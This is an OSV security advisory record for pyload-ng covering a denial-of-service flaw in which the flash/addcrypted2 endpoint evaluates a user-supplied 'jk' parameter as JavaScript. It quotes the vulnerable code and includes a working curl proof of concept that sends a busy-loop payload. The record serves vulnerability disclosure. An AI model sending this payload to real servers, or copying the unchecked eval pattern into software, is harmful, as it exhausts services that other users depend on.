{"id":"PYSEC-2026-1815","summary":"Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs","details":"Dear Maintainers,\nI am writing to you on behalf of the Tencent AI Sec. We have identified a potential vulnerability in one of your products and would like to report it to you for further investigation and mitigation.\n\n### Summary\nThe `jk` parameter is received in pyLoad CNL Blueprint. Due to the lack of `jk` parameter verification, the `jk` parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive.\n\n### Details\n- Endpoint: flash/addcrypted2\n- affected file: https://github.com/pyload/pyload/blob/develop/src/pyload/webui/app/blueprints/cnl_blueprint.py#L123\nhttps://github.com/pyload/pyload/blob/develop/src/pyload/core/utils/misc.py#L42\t\n\naffected code\n```python\n@bp.route(\"/flash/addcrypted2\", methods=[\"POST\"], endpoint=\"addcrypted2\")\n@local_check\ndef addcrypted2():\n    package = flask.request.form.get(\n        \"package\", flask.request.form.get(\"source\", flask.request.form.get(\"referer\"))\n    )\n    crypted = flask.request.form[\"crypted\"]\n    jk = flask.request.form[\"jk\"]\n    pack_password = flask.request.form.get(\"passwords\")\n\n    crypted = standard_b64decode(unquote(crypted.replace(\" \", \"+\")))\n    jk = eval_js(f\"{jk} f()\")\n\n```\n\n```python\ndef eval_js(script, es6=False):\n    if sys.version_info \u003c (3, 12):\n        return (js2py.eval_js6 if es6 else js2py.eval_js)(script)\n    else:\n        return dukpy.evaljs(script)\n```\n\n### PoC\ndownload pyload and run locally, send the following request\n- PoC\n```shell\ncurl -X POST \"http://localhost:8000/flash/addcrypted2\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  -d \"crypted=SGVsbG8gd29ybGQ=\" \\\n  -d \"passwords=pyload\" \\\n  -d \"jk=const start = Date.now();%0Awhile (Date.now() - start \u003c 30_000) {} //\"\n```\nThe 30_000 can be modified to any large value.\n\n\n### Impact\nSystem resources are exhausted, causing services to be temporarily interrupted or stopped, making them inaccessible to normal users.\n\nUse the following command to check CPU usage\n```shell\ntop -pid $(pgrep -f \"pyload.__main__\") \n```\nor\n```shell\ntop -pid $(pgrep -f \"pyload\") \n```\n\nThe CPU is fully occupied\n\u003cimg width=\"1209\" height=\"134\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5f9338fe-90c8-4e99-bd8e-a5b5c5a81a6e\" /\u003e\n\nweb-ui unresponsive\n\u003cimg width=\"1209\" height=\"496\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7100cdb6-e4d5-4d0c-a138-51b08a7b1fbd\" /\u003e","aliases":["CVE-2025-57751","GHSA-9gjj-6gj7-c4wj"],"modified":"2026-07-07T17:48:03.573296956Z","published":"2026-07-07T16:03:01.699516Z","references":[{"type":"WEB","url":"https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57751"},{"type":"PACKAGE","url":"https://github.com/pyload/pyload"},{"type":"PACKAGE","url":"https://pypi.org/project/pyload-ng"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-9gjj-6gj7-c4wj"}],"affected":[{"package":{"name":"pyload-ng","ecosystem":"PyPI","purl":"pkg:pypi/pyload-ng"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"0.5.0b3.dev92"}]}],"versions":["0.5.0a5.dev528","0.5.0a5.dev532","0.5.0a5.dev535","0.5.0a5.dev536","0.5.0a5.dev537","0.5.0a5.dev539","0.5.0a5.dev540","0.5.0a5.dev545","0.5.0a5.dev562","0.5.0a5.dev564","0.5.0a5.dev565","0.5.0a6.dev570","0.5.0a6.dev578","0.5.0a6.dev587","0.5.0a7.dev596","0.5.0a8.dev602","0.5.0a9.dev615","0.5.0a9.dev629","0.5.0a9.dev632","0.5.0a9.dev641","0.5.0a9.dev643","0.5.0a9.dev655","0.5.0a9.dev806","0.5.0b1.dev1","0.5.0b1.dev2","0.5.0b1.dev3","0.5.0b1.dev4","0.5.0b1.dev5","0.5.0b2.dev10","0.5.0b2.dev11","0.5.0b2.dev12","0.5.0b2.dev9","0.5.0b3.dev13","0.5.0b3.dev14","0.5.0b3.dev17","0.5.0b3.dev18","0.5.0b3.dev19","0.5.0b3.dev20","0.5.0b3.dev21","0.5.0b3.dev22","0.5.0b3.dev24","0.5.0b3.dev26","0.5.0b3.dev27","0.5.0b3.dev28","0.5.0b3.dev29","0.5.0b3.dev30","0.5.0b3.dev31","0.5.0b3.dev32","0.5.0b3.dev33","0.5.0b3.dev34","0.5.0b3.dev35","0.5.0b3.dev38","0.5.0b3.dev39","0.5.0b3.dev40","0.5.0b3.dev41","0.5.0b3.dev42","0.5.0b3.dev43","0.5.0b3.dev44","0.5.0b3.dev45","0.5.0b3.dev46","0.5.0b3.dev47","0.5.0b3.dev48","0.5.0b3.dev49","0.5.0b3.dev50","0.5.0b3.dev51","0.5.0b3.dev52","0.5.0b3.dev53","0.5.0b3.dev54","0.5.0b3.dev57","0.5.0b3.dev60","0.5.0b3.dev62","0.5.0b3.dev64","0.5.0b3.dev65","0.5.0b3.dev66","0.5.0b3.dev67","0.5.0b3.dev68","0.5.0b3.dev69","0.5.0b3.dev70","0.5.0b3.dev71","0.5.0b3.dev72","0.5.0b3.dev73","0.5.0b3.dev74","0.5.0b3.dev75","0.5.0b3.dev76","0.5.0b3.dev77","0.5.0b3.dev78","0.5.0b3.dev79","0.5.0b3.dev80","0.5.0b3.dev81","0.5.0b3.dev82","0.5.0b3.dev85","0.5.0b3.dev87","0.5.0b3.dev88","0.5.0b3.dev89","0.5.0b3.dev90","0.5.0b3.dev91"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/pyload-ng/PYSEC-2026-1815.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"}]}